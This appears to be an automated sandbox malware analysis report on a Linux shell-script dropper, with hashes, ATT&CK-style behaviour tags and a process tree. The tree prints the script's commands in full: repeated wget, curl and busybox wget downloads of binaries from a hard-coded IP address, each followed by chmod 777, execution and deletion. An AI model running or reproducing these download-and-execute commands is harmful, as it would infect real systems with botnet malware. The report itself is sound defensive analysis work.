bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb

Analysis

max time kernel
53s
max time network
82s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
21-11-2024 08:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
Size

10KB
MD5

7f9d3db559611740d40b8bccb98f2049
SHA1

28310a0e460821cd5a5feac8b12caa9888a8d099
SHA256

bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb
SHA512

ece04554d410979552af51e89a048b680fa4deb2af109261066b0df055cd57a8c32e7600cc3e35f5b35a6795602775103c9ae7c4ad2cf54a8bc4e36a6eeca932
SSDEEP

192:WhV/N+6upNj0sUD8//x89a3lR9lC8gwS8gBhV/N+6KpNj0sL//x89an:6mpNj0sUDslR9M8gL8gbCpNj0sZ

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 24 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
693	chmod
803	chmod
878	chmod
884	chmod
896	chmod
736	chmod
823	chmod
852	chmod
890	chmod
902	chmod
797	chmod
811	chmod
840	chmod
846	chmod
858	chmod
684	chmod
715	chmod
761	chmod
782	chmod
817	chmod
832	chmod
864	chmod
872	chmod
910	chmod

Executes dropped EXE 24 IoCs

Processes:

aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJxuUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjod9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X0wprA81cTZqq8CpDff9xycubkPkIuEDv1lTImbYyQErq2Pjn6pEs2iEgHDh0MmNCWuscyXRP32OWRCwzywQa2MrBL9WmerLEMYaLWvxoCgctsJUTWBClJkUajOFJt7yhBQpkRvbcmmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqqKHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2ejO35p3ilukvfsE6y74InUUnbLJacTwrz8t6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbcmmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqqKHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2ejO35p3ilukvfsE6y74InUUnbLJacTwrz8t6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJxuUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjod9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7

Checks CPU configuration 1 TTPs 24 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 48 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 24 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq	curl
File opened for modification	/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ	curl
File opened for modification	/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx	curl
File opened for modification	/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo	curl
File opened for modification	/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo	curl
File opened for modification	/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc	curl
File opened for modification	/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc	curl
File opened for modification	/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq	curl
File opened for modification	/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e	curl
File opened for modification	/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t	curl
File opened for modification	/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5	curl
File opened for modification	/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc	curl
File opened for modification	/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5	curl
File opened for modification	/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7	curl
File opened for modification	/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X	curl
File opened for modification	/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e	curl
File opened for modification	/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t	curl
File opened for modification	/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB	curl
File opened for modification	/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB	curl
File opened for modification	/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx	curl
File opened for modification	/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l	curl
File opened for modification	/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv	curl
File opened for modification	/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ	curl
File opened for modification	/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7	curl

/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
1⤵
PID:652
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:658
- /usr/bin/wget
  wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:661
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:674
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:681
- /bin/chmod
  chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - File and Directory Permissions Modification
  PID:684
- /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  ./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  - Executes dropped EXE
  PID:685
- /bin/rm
  rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:686
- /usr/bin/wget
  wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:687
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:688
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:689
- /bin/chmod
  chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - File and Directory Permissions Modification
  PID:693
- /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  ./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  - Executes dropped EXE
  PID:695
- /bin/rm
  rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
  2⤵
  PID:697
- /usr/bin/wget
  wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:699
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:704
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:711
- /bin/chmod
  chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - File and Directory Permissions Modification
  PID:715
- /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  ./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  - Executes dropped EXE
  PID:717
- /bin/rm
  rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
  2⤵
  PID:718
- /usr/bin/wget
  wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  PID:719
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:725
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  PID:731
- /bin/chmod
  chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  - File and Directory Permissions Modification
  PID:736
- /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  ./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  - Executes dropped EXE
  PID:737
- /bin/rm
  rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
  2⤵
  PID:738
- /usr/bin/wget
  wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  PID:739
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:747
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  PID:756
- /bin/chmod
  chmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  - File and Directory Permissions Modification
  PID:761
- /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  ./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  - Executes dropped EXE
  PID:763
- /bin/rm
  rm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
  2⤵
  PID:764
- /usr/bin/wget
  wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  PID:766
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:771
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  PID:778
- /bin/chmod
  chmod 777 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  - File and Directory Permissions Modification
  PID:782
- /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  ./0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  - Executes dropped EXE
  PID:784
- /bin/rm
  rm 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
  2⤵
  PID:785
- /usr/bin/wget
  wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  PID:786
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:791
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  PID:796
- /bin/chmod
  chmod 777 TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  - File and Directory Permissions Modification
  PID:797
- /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  ./TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  - Executes dropped EXE
  PID:798
- /bin/rm
  rm TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
  2⤵
  PID:799
- /usr/bin/wget
  wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  PID:800
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:801
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  PID:802
- /bin/chmod
  chmod 777 yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  - File and Directory Permissions Modification
  PID:803
- /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  ./yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  - Executes dropped EXE
  PID:804
- /bin/rm
  rm yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
  2⤵
  PID:805
- /usr/bin/wget
  wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:806
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:809
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:810
- /bin/chmod
  chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - File and Directory Permissions Modification
  PID:811
- /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  ./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - Executes dropped EXE
  PID:812
- /bin/rm
  rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:813
- /usr/bin/wget
  wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:814
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:815
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:816
- /bin/chmod
  chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - File and Directory Permissions Modification
  PID:817
- /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  ./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - Executes dropped EXE
  PID:818
- /bin/rm
  rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:819
- /usr/bin/wget
  wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:820
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:821
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:822
- /bin/chmod
  chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - File and Directory Permissions Modification
  PID:823
- /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  ./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - Executes dropped EXE
  PID:824
- /bin/rm
  rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:825
- /usr/bin/wget
  wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:826
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:827
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:831
- /bin/chmod
  chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - File and Directory Permissions Modification
  PID:832
- /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  ./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - Executes dropped EXE
  PID:833
- /bin/rm
  rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:834
- /usr/bin/wget
  wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:835
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:837
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:839
- /bin/chmod
  chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - File and Directory Permissions Modification
  PID:840
- /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  ./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - Executes dropped EXE
  PID:841
- /bin/rm
  rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:842
- /usr/bin/wget
  wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:843
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:844
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:845
- /bin/chmod
  chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - File and Directory Permissions Modification
  PID:846
- /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  ./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - Executes dropped EXE
  PID:847
- /bin/rm
  rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:848
- /usr/bin/wget
  wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:849
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:850
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:851
- /bin/chmod
  chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - File and Directory Permissions Modification
  PID:852
- /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  ./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  - Executes dropped EXE
  PID:853
- /bin/rm
  rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
  2⤵
  PID:854
- /usr/bin/wget
  wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:855
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:856
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:857
- /bin/chmod
  chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - File and Directory Permissions Modification
  PID:858
- /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  ./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  - Executes dropped EXE
  PID:859
- /bin/rm
  rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
  2⤵
  PID:860
- /usr/bin/wget
  wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:861
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:862
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:863
- /bin/chmod
  chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - File and Directory Permissions Modification
  PID:864
- /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  ./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  - Executes dropped EXE
  PID:865
- /bin/rm
  rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
  2⤵
  PID:866
- /usr/bin/wget
  wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:867
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:868
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:870
- /bin/chmod
  chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - File and Directory Permissions Modification
  PID:872
- /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  ./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  - Executes dropped EXE
  PID:873
- /bin/rm
  rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
  2⤵
  PID:874
- /usr/bin/wget
  wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:875
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:876
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:877
- /bin/chmod
  chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - File and Directory Permissions Modification
  PID:878
- /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  ./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  - Executes dropped EXE
  PID:879
- /bin/rm
  rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
  2⤵
  PID:880
- /usr/bin/wget
  wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:881
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:882
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:883
- /bin/chmod
  chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - File and Directory Permissions Modification
  PID:884
- /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  ./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  - Executes dropped EXE
  PID:885
- /bin/rm
  rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
  2⤵
  PID:886
- /usr/bin/wget
  wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
  PID:887
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
  2⤵
